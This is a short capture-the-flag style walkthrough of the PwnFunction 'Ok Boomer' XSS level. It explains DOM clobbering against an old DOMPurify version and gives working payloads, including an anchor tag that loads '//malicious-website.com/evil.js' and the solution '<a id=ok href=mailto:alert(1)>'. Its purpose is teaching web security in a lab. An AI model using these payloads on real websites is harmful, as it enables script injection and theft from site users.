Ok Boomer PwnFunction XSS Solution

Ok Boomer PwnFunction teaches you about DOM Clobbering technique which allows you to execute XSS by writing normal HTML tags

let’s analyze the code first

Ok Boomer PwnFunction XSS Code

The code uses a library called DOMPurify which should sanitize the user’s input and remove all dangerous code that might lead to XSS attacks, the library right now is at version 2.3.6 but the one implemented in the game is at version 2.0.7

But then, there’s a timeout function that takes a variable called “ok” and call it after 2 seconds, the weird thing is that variable not defined at all.

Here we can exploit something Called Dom Clobbering ( you can read more about it from here and here) , in short DOM Clobbering allows us to exploit XSS techniques by writing pure HTML and this is because there are global variables in the JavaScript that we can manipulate if we write our own HTML.

Let me explain a bit more, when we use a variable called “ok”, we can define it either by var x for example or create an element with id=x and when you call the variable x, it will automatically get the value attribute of the element x.

which means, if we create an element like the following

<a id=someObject><a id=someObject name=url href=//malicious-website.com/evil.js>

now let’s edit it according to our needs

<a id=ok href=mailto:alert(1)>

so we specified the id as “ok” in order for our browser to create a variable called ok (which what we need)

then the default value that will be called is the href, and i tried multiple ways but none of them worked except when i do the this:here syntax, so i used mailto but you can use what ever one you like.

And that’s all for Ok Boomer Pwnfunction XSS Level